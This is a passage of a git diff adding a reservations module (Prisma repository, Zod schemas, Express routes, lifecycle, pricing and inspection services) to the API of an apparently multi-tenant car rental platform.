companyId, type, + mileage: body.mileage ?? null, + fuelLevel: body.fuelLevel as any, + fuelCharge: body.fuelCharge ?? null, + generalCondition: body.generalCondition ?? null, + employeeNotes: body.employeeNotes ?? null, + customerAgreed: body.customerAgreed ?? false, + inspectedBy, + damagePoints: { create: body.damagePoints as any }, + }, + include: { damagePoints: true }, + }) + + const damageData = (body.damagePoints ?? []).map((p) => ({ + viewType: p.viewType, x: p.x, y: p.y, damageType: p.damageType, + severity: p.severity ?? 'MINOR', note: p.description ?? '', isPreExisting: p.isPreExisting ?? false, + })) + + await prisma.damageReport.upsert({ + where: { reservationId_type: { reservationId, type } }, + update: { + damages: damageData, + fuelLevel: body.fuelLevel as any, + mileage: body.mileage ?? null, + inspectedAt: new Date(), + inspectedBy, + customerSignedAt: (body.customerAgreed ?? false) ? new Date() : null, + customerName: `${reservation.customer.firstName} ${reservation.customer.lastName}`, + }, + create: { + reservationId, companyId, type, + damages: damageData, + photos: [], + fuelLevel: body.fuelLevel as any, + mileage: body.mileage ?? null, + inspectedAt: new Date(), + inspectedBy, + customerSignedAt: (body.customerAgreed ?? false) ? new Date() : null, + customerName: `${reservation.customer.firstName} ${reservation.customer.lastName}`, + }, + }) + + await prisma.reservation.update({ + where: { id: reservationId }, + data: type === 'CHECKIN' + ? { checkInMileage: body.mileage ?? null, checkInFuelLevel: body.fuelLevel } + : { checkOutMileage: body.mileage ?? null, checkOutFuelLevel: body.fuelLevel }, + }) + + return inspection +} diff --git a/apps/api/src/modules/reservations/reservation.insurance.service.ts b/apps/api/src/modules/reservations/reservation.insurance.service.ts new file mode 100644 index 0000000..e2718c7 --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.insurance.service.ts @@ -0,0 +1 @@ +export { applyInsurancesToReservation, calculateInsuranceCharge } from '../../services/insuranceService' diff --git a/apps/api/src/modules/reservations/reservation.lifecycle.service.ts b/apps/api/src/modules/reservations/reservation.lifecycle.service.ts new file mode 100644 index 0000000..1733744 --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.lifecycle.service.ts @@ -0,0 +1,135 @@ +import crypto from 'crypto' +import { prisma } from '../../lib/prisma' +import { AppError } from '../../http/errors' +import { validateLicense } from '../../services/licenseValidationService' +import { sendNotification, sendTransactionalEmail } from '../../services/notificationService' +import { bookingConfirmedNotif, reviewRequestEmail, type Lang } from '../../lib/emailTranslations' +import { buildReservationWorkflow, parseReservationExtras, serializeReservationForDashboard } from './reservation.presenter' +import * as repo from './reservation.repo' + +async function assertLicenseCompliance(reservationId: string, companyId: string) { + const reservation = await repo.findForLicenseCheck(reservationId, companyId) + + const customerLicense = validateLicense(reservation.customer.licenseExpiry) + const customerDenied = ['DENIED', 'EXPIRED'].includes(reservation.customer.licenseValidationStatus) + if (customerDenied || customerLicense.status === 'EXPIRED') { + throw new AppError('Primary driver license is not valid for this reservation', 400, 'invalid_primary_license') + } + if (customerLicense.requiresApproval && reservation.customer.licenseValidationStatus !== 'APPROVED') { + throw new AppError('Primary driver license requires manager approval before this reservation can proceed', 400, 'primary_license_requires_approval') + } + + const blockedDriver = reservation.additionalDrivers.find((d: any) => { + if (d.licenseExpired) return true + return d.requiresApproval && !d.approvedAt + }) + if (blockedDriver) { + throw new AppError( + `Additional driver ${blockedDriver.firstName} ${blockedDriver.lastName} requires approval before this reservation can proceed`, + 400, + 'additional_driver_requires_approval', + ) + } +} + +export async function confirmReservation(id: string, companyId: string) { + const reservation = await repo.findByIdSimple(id, companyId) + if (reservation.status !== 'DRAFT') throw new AppError('Only DRAFT reservations can be confirmed', 400, 'invalid_status') + await assertLicenseCompliance(reservation.id, companyId) + + const updated = await repo.updateById(id, { status: 'CONFIRMED' }) + + const [customer, brand] = await Promise.all([ + repo.findCustomerById(reservation.customerId), + repo.findBrandLocale(companyId), + ]) + const lang = (brand?.defaultLocale ?? 'fr') as Lang + await sendNotification({ + type: 'BOOKING_CONFIRMED', + title: bookingConfirmedNotif.title(lang), + body: bookingConfirmedNotif.body(lang), + companyId, + email: customer.email, + channels: ['EMAIL', 'IN_APP'], + locale: lang, + }).catch(() => null) + + return updated +} + +export async function checkinReservation(id: string, companyId: string, mileage?: number) { + const reservation = await repo.findByIdSimple(id, companyId) + if (reservation.status !== 'CONFIRMED') throw new AppError('Only CONFIRMED reservations can be checked in', 400, 'invalid_status') + await assertLicenseCompliance(reservation.id, companyId) + + const updated = await repo.updateById(id, { + status: 'ACTIVE', + checkedInAt: new Date(), + checkInMileage: mileage ?? null, + }) + await repo.updateVehicleStatus(reservation.vehicleId, 'RENTED') + return updated +} + +export async function checkoutReservation(id: string, companyId: string, mileage?: number) { + const reservation = await repo.findByIdForCheckout(id, companyId) + if (reservation.status !== 'ACTIVE') throw new AppError('Only ACTIVE reservations can be checked out', 400, 'invalid_status') + + const reviewToken = crypto.randomBytes(32).toString('hex') + const updated = await repo.updateById(id, { + status: 'COMPLETED', + checkedOutAt: new Date(), + checkOutMileage: mileage ?? null, + reviewToken, + }) + await repo.updateVehicleStatus(reservation.vehicleId, 'AVAILABLE', mileage) + + const [customer, company] = await Promise.all([ + repo.findCustomerById(reservation.customerId), + repo.findCompanyWithBrand(companyId), + ]) + const lang = (company?.brand?.defaultLocale ?? 'fr') as Lang + const companyName = company?.brand?.displayName ?? company?.name ?? 'the rental company' + const vehicleLabel = `${reservation.vehicle.year} ${reservation.vehicle.make} ${reservation.vehicle.model}` + const reviewUrl = `${process.env.MARKETPLACE_URL ?? process.env.NEXT_PUBLIC_MARKETPLACE_URL ?? 'http://localhost:3000'}/review?token=${reviewToken}` + + sendTransactionalEmail({ + to: customer.email, + subject: reviewRequestEmail.subject(vehicleLabel, lang), + html: reviewRequestEmail.html({ firstName: customer.firstName, companyName, vehicleLabel, reviewUrl }, lang), + text: reviewRequestEmail.text({ firstName: customer.firstName, companyName, vehicleLabel, reviewUrl }, lang), + }).catch(() => null) + + return updated +} + +export async function closeReservation(id: string, companyId: string, closedBy: string) { + const reservation = await repo.findForClose(id, companyId) + const workflow = buildReservationWorkflow(reservation) + + if (reservation.status !== 'COMPLETED') throw new AppError('Only completed reservations can be closed', 400, 'invalid_status') + if (workflow.closed) throw new AppError('This reservation is already closed', 400, 'already_closed') + + const extras = parseReservationExtras(reservation.extras) + extras.reservationClosedAt = new Date().toISOString() + extras.reservationClosedBy = closedBy + + const updated = await prisma.reservation.update({ + where: { id: reservation.id }, + data: { extras: extras as any }, + include: { vehicle: true, customer: true, insurances: true, additionalDrivers: true, rentalPayments: true, damageReports: true }, + }) + return serializeReservationForDashboard(updated) +} + +export async function cancelReservation(id: string, companyId: string, reason?: string) { + const reservation = await repo.findByIdSimple(id, companyId) + if (['COMPLETED', 'CANCELLED'].includes(reservation.status)) { + throw new AppError('Reservation cannot be cancelled', 400, 'invalid_status') + } + const updated = await repo.updateById(id, { status: 'CANCELLED', cancelReason: reason ?? null, cancelledBy: 'COMPANY' }) + if (['CONFIRMED', 'ACTIVE'].includes(reservation.status)) { + await repo.updateVehicleStatus(reservation.vehicleId, 'AVAILABLE') + } + return updated +} diff --git a/apps/api/src/modules/reservations/reservation.presenter.test.ts b/apps/api/src/modules/reservations/reservation.presenter.test.ts new file mode 100644 index 0000000..6653e1d --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.presenter.test.ts @@ -0,0 +1,20 @@ +import { describe, it, expect } from 'vitest' +import { serializeReservationForDashboard } from './reservation.presenter' + +describe('serializeReservationForDashboard', () => { + it('rewrites customer license image URLs to the protected route', () => { + const result = serializeReservationForDashboard({ + id: 'reservation-1', + status: 'CONFIRMED', + contractNumber: null, + invoiceNumber: null, + extras: {}, + customer: { + id: 'customer-1', + licenseImageUrl: 'http://localhost:4000/storage/companies/company-1/customers/customer-1/license.jpg', + }, + }) + + expect(result.customer?.licenseImageUrl).toBe('http://localhost:3001/dashboard/api/v1/customers/customer-1/license-image') + }) +}) diff --git a/apps/api/src/modules/reservations/reservation.presenter.ts b/apps/api/src/modules/reservations/reservation.presenter.ts new file mode 100644 index 0000000..20c3c2c --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.presenter.ts @@ -0,0 +1,63 @@ +import { getProtectedCustomerLicenseImageUrl } from '../../lib/storage' + +export function parseReservationExtras(extras: unknown): Record { + if (!extras || typeof extras !== 'object' || Array.isArray(extras)) return {} + return { ...(extras as Record) } +} + +export function normalizeOptionalString(value: string | null | undefined): string | null { + const trimmed = typeof value === 'string' ? value.trim() : value + return trimmed || null +} + +export function buildReservationWorkflow(reservation: { + status: string + contractNumber: string | null + invoiceNumber: string | null + extras: unknown +}) { + const extras = parseReservationExtras(reservation.extras) + const closedAt = typeof extras.reservationClosedAt === 'string' ? extras.reservationClosedAt : null + const contractGenerated = Boolean(reservation.contractNumber || reservation.invoiceNumber) + const closed = Boolean(closedAt) + + return { + contractGenerated, + closed, + closedAt, + closedBy: typeof extras.reservationClosedBy === 'string' ? extras.reservationClosedBy : null, + coreEditable: !closed && !contractGenerated && ['DRAFT', 'CONFIRMED'].includes(reservation.status), + returnEditable: !closed && reservation.status === 'COMPLETED', + checkInInspectionEditable: !closed && ['CONFIRMED', 'ACTIVE'].includes(reservation.status), + checkOutInspectionEditable: !closed && reservation.status === 'COMPLETED', + } +} + +export function serializeReservationForDashboard(reservation: T): T & { paymentMode: string | null; workflow: ReturnType } { + const extras = parseReservationExtras(reservation.extras) + const customer = + reservation.customer + ? { + ...reservation.customer, + licenseImageUrl: reservation.customer.licenseImageUrl + ? getProtectedCustomerLicenseImageUrl(reservation.customer.id) + : null, + } + : reservation.customer + + return { + ...reservation, + ...(customer !== undefined ? { customer } : {}), + paymentMode: typeof extras.paymentMode === 'string' ? extras.paymentMode : null, + workflow: buildReservationWorkflow(reservation), + } +} diff --git a/apps/api/src/modules/reservations/reservation.pricing.service.ts b/apps/api/src/modules/reservations/reservation.pricing.service.ts new file mode 100644 index 0000000..e9a7497 --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.pricing.service.ts @@ -0,0 +1,27 @@ +export { applyPricingRules } from '../../services/pricingRuleService' + +export function calculateUpdatedInsuranceCharge( + chargeType: 'PER_DAY' | 'PER_RENTAL' | 'PERCENTAGE_OF_RENTAL', + chargeValue: number, + totalDays: number, + baseRentalAmount: number, +): number { + switch (chargeType) { + case 'PER_DAY': return chargeValue * totalDays + case 'PER_RENTAL': return chargeValue + case 'PERCENTAGE_OF_RENTAL': return Math.round(baseRentalAmount * chargeValue / 100) + default: return 0 + } +} + +export function calculateUpdatedAdditionalDriverCharge( + chargeType: 'PER_DAY' | 'FLAT' | 'FREE', + chargeValue: number, + totalDays: number, +): number { + switch (chargeType) { + case 'PER_DAY': return chargeValue * totalDays + case 'FLAT': return chargeValue + default: return 0 + } +} diff --git a/apps/api/src/modules/reservations/reservation.repo.ts b/apps/api/src/modules/reservations/reservation.repo.ts new file mode 100644 index 0000000..7313938 --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.repo.ts @@ -0,0 +1,161 @@ +import { prisma } from '../../lib/prisma' + +const FULL_INCLUDE = { + vehicle: true, + customer: true, + insurances: true, + additionalDrivers: true, + rentalPayments: true, + damageReports: true, +} + +export async function findMany(where: any, skip: number, take: number) { + return Promise.all([ + prisma.reservation.findMany({ + where, + include: { vehicle: true, customer: true }, + skip, + take, + orderBy: { createdAt: 'desc' }, + }), + prisma.reservation.count({ where }), + ]) +} + +export async function findById(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ where: { id, companyId }, include: FULL_INCLUDE }) +} + +export async function findByIdSimple(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ where: { id, companyId } }) +} + +export async function findByIdWithRelations(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ + where: { id, companyId }, + include: { insurances: true, additionalDrivers: true }, + }) +} + +export async function findByIdForCheckout(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ + where: { id, companyId }, + include: { vehicle: true }, + }) +} + +export async function findForLicenseCheck(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ + where: { id, companyId }, + include: { customer: true, additionalDrivers: true }, + }) +} + +export async function findForContract(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ + where: { id, companyId }, + include: { + vehicle: true, + customer: true, + insurances: true, + additionalDrivers: true, + rentalPayments: { orderBy: { createdAt: 'asc' } }, + inspections: { include: { damagePoints: true }, orderBy: { inspectedAt: 'asc' } }, + company: { include: { brand: true, contractSettings: true, accountingSettings: true } }, + }, + }) +} + +export async function findForBilling(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ + where: { id, companyId }, + include: { vehicle: true, insurances: true, additionalDrivers: true }, + }) +} + +export async function findForClose(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ where: { id, companyId } }) +} + +export async function findForInspection(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ + where: { id, companyId }, + include: { vehicle: true, customer: true }, + }) +} + +export async function findConflict(vehicleId: string, start: Date, end: Date, excludeId?: string) { + return prisma.reservation.findFirst({ + where: { + vehicleId, + status: { in: ['CONFIRMED', 'ACTIVE'] }, + startDate: { lt: end }, + endDate: { gt: start }, + ...(excludeId ? { id: { not: excludeId } } : {}), + }, + }) +} + +export async function create(data: any) { + return prisma.reservation.create({ data, include: { vehicle: true, customer: true } }) +} + +export async function updateById(id: string, data: any) { + return prisma.reservation.update({ where: { id }, data }) +} + +export async function findActiveOffer(companyId: string, promoCode: string) { + return prisma.offer.findFirst({ + where: { companyId, promoCode, isActive: true, validFrom: { lte: new Date() }, validUntil: { gte: new Date() } }, + }) +} + +export async function incrementOfferRedemption(offerId: string) { + return prisma.offer.update({ where: { id: offerId }, data: { redemptionCount: { increment: 1 } } }) +} + +export async function findVehicle(vehicleId: string, companyId: string) { + return prisma.vehicle.findFirstOrThrow({ where: { id: vehicleId, companyId } }) +} + +export async function findCustomer(customerId: string, companyId: string) { + return prisma.customer.findFirstOrThrow({ where: { id: customerId, companyId } }) +} + +export async function findCustomerById(customerId: string) { + return prisma.customer.findUniqueOrThrow({ where: { id: customerId } }) +} + +export async function updateVehicleStatus(vehicleId: string, status: string, mileage?: number) { + return prisma.vehicle.update({ + where: { id: vehicleId }, + data: { status: status as any, ...(mileage !== undefined ? { mileage } : {}) }, + }) +} + +export async function findCompanyWithBrand(companyId: string) { + return prisma.company.findUnique({ + where: { id: companyId }, + include: { brand: { select: { displayName: true, defaultLocale: true } } }, + }) +} + +export async function findBrandLocale(companyId: string) { + return prisma.brandSettings.findUnique({ where: { companyId }, select: { defaultLocale: true } }) +} + +export async function findInspections(reservationId: string, companyId: string) { + return prisma.damageInspection.findMany({ + where: { reservationId, companyId }, + include: { damagePoints: true }, + orderBy: { inspectedAt: 'asc' }, + }) +} + +export async function findAdditionalDriver(driverId: string, reservationId: string, companyId: string) { + return prisma.additionalDriver.findFirstOrThrow({ where: { id: driverId, reservationId, companyId } }) +} + +export async function updateAdditionalDriver(id: string, data: any) { + return prisma.additionalDriver.update({ where: { id }, data }) +} diff --git a/apps/api/src/modules/reservations/reservation.routes.ts b/apps/api/src/modules/reservations/reservation.routes.ts new file mode 100644 index 0000000..5868479 --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.routes.ts @@ -0,0 +1,144 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireSubscription } from '../../middleware/requireSubscription' +import { parseBody, parseQuery, parseParams } from '../../http/validate' +import { ok, created } from '../../http/respond' +import * as service from './reservation.service' +import * as lifecycle from './reservation.lifecycle.service' +import * as inspectionService from './reservation.inspection.service' +import * as additionalDriverService from './reservation.additional-driver.service' +import { getContract, getBilling } from './reservation.document.service' +import { + createSchema, updateSchema, listQuerySchema, + checkinSchema, checkoutSchema, cancelSchema, approvalSchema, + inspectionSchema, inspectionTypeParam, + idParamSchema, driverParamSchema, inspectionParamSchema, +} from './reservation.schemas' + +const router = Router() +router.use(requireCompanyAuth, requireTenant, requireSubscription) + +router.get('/', async (req, res, next) => { + try { + const query = parseQuery(listQuerySchema, req) + const result = await service.listReservations(req.companyId, query) + res.json(result) + } catch (err) { next(err) } +}) + +router.post('/', async (req, res, next) => { + try { + const body = parseBody(createSchema, req) + const reservation = await service.createReservation(req.companyId, body) + created(res, reservation) + } catch (err) { next(err) } +}) + +router.get('/:id', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const reservation = await service.getReservation(id, req.companyId) + ok(res, reservation) + } catch (err) { next(err) } +}) + +router.patch('/:id', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const body = parseBody(updateSchema, req) + const reservation = await service.updateReservation(id, req.companyId, body) + ok(res, reservation) + } catch (err) { next(err) } +}) + +router.get('/:id/contract', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const contract = await getContract(id, req.companyId) + ok(res, contract) + } catch (err) { next(err) } +}) + +router.get('/:id/billing', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const billing = await getBilling(id, req.companyId) + ok(res, billing) + } catch (err) { next(err) } +}) + +router.post('/:id/confirm', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const updated = await lifecycle.confirmReservation(id, req.companyId) + ok(res, updated) + } catch (err) { next(err) } +}) + +router.post('/:id/checkin', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { mileage } = parseBody(checkinSchema, req) + const updated = await lifecycle.checkinReservation(id, req.companyId, mileage) + ok(res, updated) + } catch (err) { next(err) } +}) + +router.post('/:id/checkout', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { mileage } = parseBody(checkoutSchema, req) + const updated = await lifecycle.checkoutReservation(id, req.companyId, mileage) + ok(res, updated) + } catch (err) { next(err) } +}) + +router.post('/:id/close', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const closedBy = `${req.employee.firstName} ${req.employee.lastName}` + const reservation = await lifecycle.closeReservation(id, req.companyId, closedBy) + ok(res, reservation) + } catch (err) { next(err) } +}) + +router.post('/:id/cancel', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { reason } = parseBody(cancelSchema, req) + const updated = await lifecycle.cancelReservation(id, req.companyId, reason) + ok(res, updated) + } catch (err) { next(err) } +}) + +router.get('/:id/inspections', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const inspections = await inspectionService.getInspections(id, req.companyId) + ok(res, inspections) + } catch (err) { next(err) } +}) + +router.put('/:id/inspections/:type', async (req, res, next) => { + try { + const { id, type: rawType } = parseParams(inspectionParamSchema, req) + const type = inspectionTypeParam.parse(rawType.toUpperCase()) + const body = parseBody(inspectionSchema, req) + const inspectedBy = `${req.employee.firstName} ${req.employee.lastName}` + const result = await inspectionService.upsertInspection(id, req.companyId, type, body, inspectedBy) + ok(res, result) + } catch (err) { next(err) } +}) + +router.patch('/:id/additional-drivers/:driverId/approval', async (req, res, next) => { + try { + const { id, driverId } = parseParams(driverParamSchema, req) + const { approved, note } = parseBody(approvalSchema, req) + const approvedBy = `${req.employee.firstName} ${req.employee.lastName}` + const updated = await additionalDriverService.approveAdditionalDriver(id, driverId, req.companyId, approved, note, approvedBy) + ok(res, updated) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/reservations/reservation.schemas.ts b/apps/api/src/modules/reservations/reservation.schemas.ts new file mode 100644 index 0000000..61e8c3d --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.schemas.ts @@ -0,0 +1,79 @@ +import { z } from 'zod' + +export const additionalDriverSchema = z.object({ + firstName: z.string().min(1), + lastName: z.string().min(1), + email: z.string().email().optional(), + phone: z.string().optional(), + driverLicense: z.string().min(1), + licenseExpiry: z.string().datetime().optional(), + licenseIssuedAt: z.string().datetime().optional(), + dateOfBirth: z.string().datetime().optional(), + nationality: z.string().optional(), +}) + +export const inspectionSchema = z.object({ + mileage: z.number().int().optional(), + fuelLevel: z.enum(['FULL', 'SEVEN_EIGHTHS', 'THREE_QUARTERS', 'FIVE_EIGHTHS', 'HALF', 'THREE_EIGHTHS', 'QUARTER', 'ONE_EIGHTH', 'EMPTY']), + fuelCharge: z.number().int().min(0).optional(), + generalCondition: z.string().optional(), + employeeNotes: z.string().optional(), + customerAgreed: z.boolean().default(false), + damagePoints: z.array(z.object({ + viewType: z.enum(['TOP', 'FRONT', 'REAR', 'LEFT', 'RIGHT']), + x: z.number(), + y: z.number(), + damageType: z.enum(['SCRATCH', 'DENT', 'CRACK', 'CHIP', 'MISSING', 'STAIN', 'OTHER']), + severity: z.enum(['MINOR', 'MODERATE', 'MAJOR']).default('MINOR'), + description: z.string().optional(), + isPreExisting: z.boolean().default(false), + })).default([]), +}) + +export const createSchema = z.object({ + vehicleId: z.string().cuid(), + customerId: z.string().cuid(), + startDate: z.string().datetime(), + endDate: z.string().datetime(), + pickupLocation: z.string().optional(), + returnLocation: z.string().optional(), + offerId: z.string().cuid().optional(), + promoCodeUsed: z.string().optional(), + depositAmount: z.number().int().min(0).default(0), + paymentMode: z.string().max(50).optional(), + notes: z.string().optional(), + selectedInsurancePolicyIds: z.array(z.string()).default([]), + additionalDrivers: z.array(additionalDriverSchema).default([]), +}) + +export const updateSchema = z.object({ + startDate: z.string().datetime().optional(), + endDate: z.string().datetime().optional(), + pickupLocation: z.string().optional().nullable(), + returnLocation: z.string().optional().nullable(), + depositAmount: z.number().int().min(0).optional(), + notes: z.string().optional().nullable(), + paymentMode: z.string().max(50).optional().nullable(), + damageChargeAmount: z.number().int().min(0).optional(), + damageChargeNote: z.string().optional().nullable(), +}) + +export const listQuerySchema = z.object({ + status: z.string().optional(), + vehicleId: z.string().optional(), + source: z.string().optional(), + startDate: z.string().optional(), + endDate: z.string().optional(), + page: z.coerce.number().int().min(1).default(1), + pageSize: z.coerce.number().int().min(1).max(100).default(20), +}) + +export const checkinSchema = z.object({ mileage: z.number().int().optional() }) +export const checkoutSchema = z.object({ mileage: z.number().int().optional() }) +export const cancelSchema = z.object({ reason: z.string().optional() }) +export const approvalSchema = z.object({ approved: z.boolean(), note: z.string().optional() }) +export const inspectionTypeParam = z.enum(['CHECKIN', 'CHECKOUT']) + +export const idParamSchema = z.object({ id: z.string() }) +export const driverParamSchema = z.object({ id: z.string(), driverId: z.string() }) +export const inspectionParamSchema = z.object({ id: z.string(), type: z.string() }) diff --git a/apps/api/src/modules/reservations/reservation.service.ts b/apps/api/src/modules/reservations/reservation.service.ts new file mode 100644 index 0000000..cf4c308 --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.service.ts @@ -0,0 +1,216 @@ +import { prisma } from '../../lib/prisma' +import { AppError } from '../../http/errors' +import { validateAndFlagLicense } from '../../services/licenseValidationService' +import { applyPricingRules, calculateUpdatedInsuranceCharge, calculateUpdatedAdditionalDriverCharge } from './reservation.pricing.service' +import { applyInsurancesToReservation } from './reservation.insurance.service' +import { applyAdditionalDriversToReservation } from './reservation.additional-driver.service' +import { parseReservationExtras, normalizeOptionalString, serializeReservationForDashboard, buildReservationWorkflow } from './reservation.presenter' +import * as repo from './reservation.repo' + +export async function listReservations(companyId: string, query: { + status?: string; vehicleId?: string; source?: string + startDate?: string; endDate?: string; page?: number; pageSize?: number +}) { + const page = query.page ?? 1 + const pageSize = query.pageSize ?? 20 + const where: any = { companyId } + if (query.status) where.status = query.status + if (query.vehicleId) where.vehicleId = query.vehicleId + if (query.source) where.source = query.source + if (query.startDate) where.startDate = { gte: new Date(query.startDate) } + if (query.endDate) where.endDate = { lte: new Date(query.endDate) } + + const [reservations, total] = await repo.findMany(where, (page - 1) * pageSize, pageSize) + return { + data: reservations.map(serializeReservationForDashboard), + total, + page, + pageSize, + totalPages: Math.ceil(total / pageSize), + } +} + +export async function getReservation(id: string, companyId: string) { + const reservation = await repo.findById(id, companyId) + return serializeReservationForDashboard(reservation) +} + +export async function createReservation(companyId: string, body: { + vehicleId: string; customerId: string; startDate: string; endDate: string + pickupLocation?: string; returnLocation?: string; offerId?: string + promoCodeUsed?: string; depositAmount?: number; paymentMode?: string; notes?: string + selectedInsurancePolicyIds?: string[]; additionalDrivers?: any[] +}) { + const vehicle = await repo.findVehicle(body.vehicleId, companyId) + await repo.findCustomer(body.customerId, companyId) + + const start = new Date(body.startDate) + const end = new Date(body.endDate) + const totalDays = Math.ceil((end.getTime() - start.getTime()) / (1000 * 60 * 60 * 24)) + + const conflict = await repo.findConflict(body.vehicleId, start, end) + if (conflict) throw new AppError('Vehicle is not available for the selected dates', 409, 'vehicle_unavailable') + + let discountAmount = 0 + let offerId: string | null = body.offerId ?? null + + if (body.promoCodeUsed) { + const offer = await repo.findActiveOffer(companyId, body.promoCodeUsed) + if (offer) { + offerId = offer.id + const base = vehicle.dailyRate * totalDays + if (offer.type === 'PERCENTAGE') discountAmount = Math.round(base * offer.discountValue / 100) + else if (offer.type === 'FIXED_AMOUNT') discountAmount = offer.discountValue + else if (offer.type === 'FREE_DAY') discountAmount = vehicle.dailyRate * offer.discountValue + await repo.incrementOfferRedemption(offer.id) + } + } + + const depositAmount = body.depositAmount ?? 0 + const additionalDriversList = body.additionalDrivers ?? [] + const baseAmount = vehicle.dailyRate * totalDays + const { applied, total: pricingTotal } = await applyPricingRules(companyId, body.customerId, additionalDriversList, vehicle.dailyRate, totalDays) + const totalAmount = baseAmount - discountAmount + pricingTotal + depositAmount + + const reservation = await repo.create({ + companyId, + vehicleId: body.vehicleId, + customerId: body.customerId, + startDate: start, + endDate: end, + pickupLocation: body.pickupLocation ?? null, + returnLocation: body.returnLocation ?? null, + offerId, + promoCodeUsed: body.promoCodeUsed ?? null, + source: 'DASHBOARD', + dailyRate: vehicle.dailyRate, + discountAmount, + totalDays, + totalAmount, + depositAmount, + notes: body.notes ?? null, + extras: body.paymentMode ? { paymentMode: body.paymentMode } : undefined, + pricingRulesApplied: applied, + pricingRulesTotal: pricingTotal, + }) + + const insuranceIds = body.selectedInsurancePolicyIds ?? [] + const additionalDrivers = body.additionalDrivers ?? [] + if (insuranceIds.length > 0) { + await applyInsurancesToReservation(reservation.id, companyId, insuranceIds, totalDays, baseAmount) + } + if (additionalDrivers.length > 0) { + await applyAdditionalDriversToReservation(reservation.id, companyId, additionalDrivers, totalDays) + } + + await validateAndFlagLicense(body.customerId).catch(() => null) + return reservation +} + +export async function updateReservation(id: string, companyId: string, body: { + startDate?: string; endDate?: string; pickupLocation?: string | null + returnLocation?: string | null; depositAmount?: number; notes?: string | null + paymentMode?: string | null; damageChargeAmount?: number; damageChargeNote?: string | null +}) { + const reservation = await repo.findByIdWithRelations(id, companyId) + + if (reservation.status === 'CANCELLED' || reservation.status === 'NO_SHOW') { + throw new AppError('This reservation can no longer be edited', 400, 'invalid_status') + } + + const workflow = buildReservationWorkflow(reservation) + const requested = Object.keys(body).filter((k) => body[k as keyof typeof body] !== undefined) + const bookingFields = ['startDate', 'endDate', 'pickupLocation', 'returnLocation', 'depositAmount', 'notes', 'paymentMode'] + const returnFields = ['returnLocation', 'damageChargeAmount', 'damageChargeNote'] + + if (!workflow.coreEditable && !workflow.returnEditable) { + throw new AppError('This reservation is locked for editing', 400, 'reservation_locked') + } + + if (workflow.coreEditable) { + const invalid = requested.filter((f) => !bookingFields.includes(f)) + if (invalid.length > 0) throw new AppError('Only booking details can be edited at this stage', 400, 'invalid_fields') + + const nextStart = body.startDate ? new Date(body.startDate) : reservation.startDate + const nextEnd = body.endDate ? new Date(body.endDate) : reservation.endDate + const totalDays = Math.ceil((nextEnd.getTime() - nextStart.getTime()) / (1000 * 60 * 60 * 24)) + + if (nextEnd <= nextStart || totalDays <= 0) throw new AppError('End date must be after start date', 400, 'invalid_dates') + + if (body.startDate || body.endDate) { + const conflict = await repo.findConflict(reservation.vehicleId, nextStart, nextEnd, reservation.id) + if (conflict) throw new AppError('Vehicle is not available for the selected dates', 409, 'vehicle_unavailable') + } + + const baseAmount = reservation.dailyRate * totalDays + const { applied, total: pricingRulesTotal } = await applyPricingRules( + companyId, + reservation.customerId, + reservation.additionalDrivers.map((d: any) => ({ dateOfBirth: d.dateOfBirth, licenseIssuedAt: d.licenseIssuedAt })), + reservation.dailyRate, + totalDays, + ) + + const insuranceUpdates = reservation.insurances.map((ins: any) => ({ + id: ins.id, + totalCharge: calculateUpdatedInsuranceCharge(ins.chargeType, ins.chargeValue, totalDays, baseAmount), + })) + const driverUpdates = reservation.additionalDrivers.map((d: any) => ({ + id: d.id, + totalCharge: calculateUpdatedAdditionalDriverCharge(d.chargeType, d.chargeValue, totalDays), + })) + + const insuranceTotal = insuranceUpdates.reduce((s, i) => s + i.totalCharge, 0) + const additionalDriverTotal = driverUpdates.reduce((s, d) => s + d.totalCharge, 0) + const depositAmount = body.depositAmount ?? reservation.depositAmount + const totalAmount = baseAmount - reservation.discountAmount + pricingRulesTotal + insuranceTotal + additionalDriverTotal + depositAmount + + const extras = parseReservationExtras(reservation.extras) + if (body.paymentMode !== undefined) { + const next = normalizeOptionalString(body.paymentMode) + if (next) extras.paymentMode = next + else delete extras.paymentMode + } + + await prisma.$transaction([ + prisma.reservation.update({ + where: { id: reservation.id }, + data: { + startDate: nextStart, + endDate: nextEnd, + totalDays, + pickupLocation: body.pickupLocation !== undefined ? normalizeOptionalString(body.pickupLocation) : reservation.pickupLocation, + returnLocation: body.returnLocation !== undefined ? normalizeOptionalString(body.returnLocation) : reservation.returnLocation, + depositAmount, + notes: body.notes !== undefined ? normalizeOptionalString(body.notes) : reservation.notes, + pricingRulesApplied: applied, + pricingRulesTotal, + insuranceTotal, + additionalDriverTotal, + totalAmount, + extras: (Object.keys(extras).length > 0 ? extras : {}) as any, + }, + }), + ...insuranceUpdates.map((ins) => + 